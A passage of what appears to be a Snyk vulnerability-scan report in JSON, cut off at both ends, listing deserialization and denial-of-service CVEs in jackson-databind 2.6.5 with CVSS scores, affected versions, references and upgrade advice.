Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + 